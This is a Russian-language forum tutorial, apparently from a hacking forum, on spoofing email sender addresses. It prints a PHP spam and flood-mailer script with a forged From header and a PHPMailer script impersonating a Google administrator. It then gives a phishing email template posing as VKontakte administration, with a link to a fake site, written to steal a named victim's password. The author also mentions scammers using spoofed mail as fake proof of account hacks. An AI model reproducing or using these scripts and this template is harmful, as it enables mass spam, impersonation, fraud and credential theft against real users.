"Подделываем" почту и приминяем на практике
Моя первая статья ... строго не судите
Intro
Я хочу рассказать вам о замене исходящего адреса в e-mail и его практическом применении
Вы можете отправить письмо своему другу от billi@microsoft.com и сказать, что взломали сервер майкрософта.
Но есть и более "вкусные" применения ... Code
В гугле всегда можно отыскать то, что нам нужно, в данном случае это готовый скрипт (автора NOmeR1) отправки писем с подменой адреса отправителя
PHP код:
<?
/*
(C) NOmeR1
*/
?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<?
//
error_reporting (0);
if(!set_time_limit(0)) {
$limit = false;
} else {
set_time_limit(0);
ignore_user_abort(1);
$limit = true;
}
$log = 'log.txt'; // Файл лога
ini_set('max_execution_time', '0');
?>
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
echo('<font color=Red>Off</font> (Время работы ограничено текущими настройками сервера)');?><br>
<?
$ip = getenv('REMOTE_ADDR');
if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{
$_POST['to'] = stripslashes($_POST['to']);
$_POST['msg'] = stripslashes($_POST['msg']);
$_POST['from'] = stripslashes($_POST['from']);
$_POST['subject'] = stripslashes($_POST['subject']);
if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
{
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n";
$headers .= "From: ".$_POST['from']."\n";
if($_GET['mail'] == '1')
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');
}
elseif($_GET['mail'] == '2')
{
$_POST['to'] = explode("\n",$_POST['to']);
foreach($_POST['to'] as $poluchatels)
{
mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');
}
}
elseif($_GET['mail'] == '3')
{
if(preg_match('/[0-9]+/',$_POST['kol']))
{
for($i=0;$i<$_POST['kol'];$i++)
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Не возможно отправить сообщение');
sleep(1);
}
}
else
{
echo('Неверно введено (или не введено) кол-во сообщений');
}
}
$f = fopen($log,'a');
fwrite($f,'Отправелено сообщение &'.$_POST['msg'].'& с темой "'.$_POST['subject'].'" для "'.$_POST['to'].'" с IP - "'.$ip."\"\r\n");
fclose($f);
echo('<center><b><font color="green">Сообщение успешно отправлено</font></b></center>');
}
else
{
?>
<form style="width:350px" method='post'>
<?
if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo("Получатель <input type='text'name='to'><br>");
}
?>
Отправитель <input type='text' name='from'><br>
Тема сообщ. <input type='text' name='subject'><br>
<?
if($_GET['mail'] == '3')
{
echo("Кол-во сообщений <input type='text' name='kol'><br>");
}
?>
<br>
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<?
if($_GET['mail'] == '2')
{
echo("Получатели<br><textarea name='to' rows='10' cols='30'>admin@admin.ru
admin@mail.ru
tiger@ya.ru</textarea>");
}
?>
<br>Сообщение<br>
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
</form>
<?
}
} else {
?><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Отправить простое сообщение</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Наспамить</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Налудить</a><br>
<?
}
?>
- Загружаем скрипт на сервер с поддержкой .php
- Заполняем поля: Отправитель,Получатель,Тем а,Сообщение
- и всё :)
http://s55.radikal.ru/i147/0901/a3/5dd96a2bc363.jpg
----------------------------------------------------------------------
Ну конечно лёгким путём мы не пойдём и напишем свой скрипт (файл class.phpmailer.php можно скачать тут или тут)
PHP код:
<?php
require('class.phpmailer.php');
$messag='Привет!';
$to = 'Admin@antichat.ru';
$subject = 'Как дела ?'; // Тема письма
$from_name='Админ_гугла'; // От кого (Имя)
$from_email='admin@google.ru'; // От кого (e-mail)
$mail = new PHPMailer();
$mail->From = $from_email;
$mail->FromName = $from_name ;
$mail->AddAddress($to, $to_adres);
$mail->IsHTML(true); // Вид письма (HTML)
$mail->Subject = $subject;
$mail->Body = $messag;
if ($mail->Send())
{
$res = 'Отослали';
}
else
{
$res = 'Ошибка';
echo 'Mailer Error: '.$mail->ErrorInfo;
}
echo $res;
?>
Приминение
Кидалы иногда используют данный метод при продаже почты либо после якобы взлома (тоесть вы заказываете взлом e-mail и в качестве доказательства вам присылают письмо с как будто бы взломленной почты)
Но подмена адреса может понадобится и простому " СИ инженеру"
Есть такой замечательный (хотя может и нет) сервис Vkontakte.ru
Допустим мы хотим узнать пароль челвека. Для начала нужно узнать его E-mail (Настоящему СИ инженеру пара пустяков ;)) дальше с помощью нашего скрипта отправляем письмо на почту жертве (от ВКонтакте.ру <admin@vkontakte.ru> )
Код:
/*Полное имя жертвы*/,
Павел Дуров оставил комментарий к Вашей фотографии.
http://www.фейк.ru/photos.php=act&id=12374904_113674884
С уважением,
Администрация ВКонтакте.ру
_____
Вы можете поменять настройки e-mail оповещений на странице:
http://vkontakte.ru/settings.php?act=notify
И если "жертва" клюнула, пароль у вас :)
Естественно можно тоже самое делать с другими сайтами ;)
Желаю всем удачи и С Новым Годом = )
|
